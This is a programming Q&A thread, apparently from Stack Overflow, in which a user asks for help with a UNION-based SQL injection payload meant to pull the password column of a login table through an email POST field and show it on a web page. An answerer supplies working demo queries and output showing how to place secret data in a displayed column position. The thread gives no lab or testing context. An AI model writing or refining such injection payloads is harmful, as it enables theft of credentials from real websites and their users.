# Select union not returning expected column

Tags: mysql, sql, sql-injection

I made this sql query in order to return password column with another name.

```
SELECT * FROM 
login 
where email = '1' or '1' = '1' 
union 
select password as foo, null as col, null as col, 
        null as col, null as col, null as col,
        null as col,null as col,null as col,
        null as col,null as col,null as col,
        null as col,null as col,null as col,
        null as col,null as col,null as col 
from login
```

This query do not return any foo column.
What's the problem?

EDIT: 
I want to inject a table through the email. I want to print passwords as "foo" replacing (post) "Select * from login where email = $POST"

Comment: Do you get an error message? If so lets see it

Comment: You cannot use the same alias for more than one column

Comment: no error message is shown, but no foo table is returned

Comment: Working on an SQL Injection? 
Plus, have you considered to replace the asterisk operator with actual columns names? I think it having troubles "mapping". In addition, I would advice to give each alias a different name instead of all the same.

Comment: how can I get passwords column as foo but just coding from "email=" to the front?

Comment: Maybe you should show us the schema and then tel us what you are attempting to do

Comment: I can't replace asterisk as I just have acess to email ="$_POST"....

Comment: @RiggsFolly  - "cannot use the same alias" - I think you can. And they don't even matter in the second part of UNION.

Answer (score 0):

This is because you are doing a `SELECT * ... UNION` You can't redefine aliases in the union.

**Schema (MySQL v5.7)**

```
create table test
(
  id int,
  datas varchar(255)
);

INSERT INTO test VALUES (1, "foo"), (2, "bar");
```

---

**Query #1**

```
SELECT *
FROM test
UNION
SELECT id AS toto, -- toto alias won't be used, the col name was defined in select *
     NULL AS lol   -- same than above
FROM test;
```

**Output** Check field names

```
| id  | datas |
| --- | ----- |
| 1   | foo   |
| 2   | bar   |
| 1   |       |
| 2   |       |
```

---

[View on DB Fiddle](https://www.db-fiddle.com/f/4jip3KuxzYupMgKvojd18j/0)

---

Since you can't rename a column in the UNION, you can still guess the order of the columns and try to fetch the datas at that correct position (fetch the secret datas at the place of the displayed ones)

**Schema (MySQL v5.7)**

```
create table test
(
  id int,
  DisplayedDatas varchar(255),
  SecretDatas varchar(255)
);

INSERT INTO test VALUES (1, "foo", "password1"), (2, "bar", "password2");
```

---

**Query #1**

```
SELECT *
FROM test
WHERE DisplayedDatas = '1' or '1' = '1'
UNION 
SELECT NULL, SecretDatas, NULL
FROM test;
```

**Output**

```
| id  | DisplayedDatas | SecretDatas |
| --- | -------------- | ----------- |
| 1   | foo            | password1   |
| 2   | bar            | password2   |
|     | password1      |             |
|     | password2      |             |
```

---

[View on DB Fiddle](https://www.db-fiddle.com/f/7urYfykmQ8wGcGCn8WL9d3/0)

Comment: I mean, I want passwords to be returned in a column with the name "foo".. 
For you example I would need the equivalent column foo with all the ids

Comment: By "foo" do you expect this name already exist in the `SELECT *` col names ? Or you want to get that name arbitrary ?

Comment: I mean "foo" but in fact I'll use "first_name". This is because first name is printed in html page and I want to get passwords named as "first_name" in order to be printed in page. Was I clear? (hard english sorry)

Comment: if `first_name` is a field of your table, you can use this column position to get your datas displayed. I'm editing

Comment: so they will be displayed in the end without id?

Comment: This is because I used `NULL` at the place of id. You still can use `id` instead of null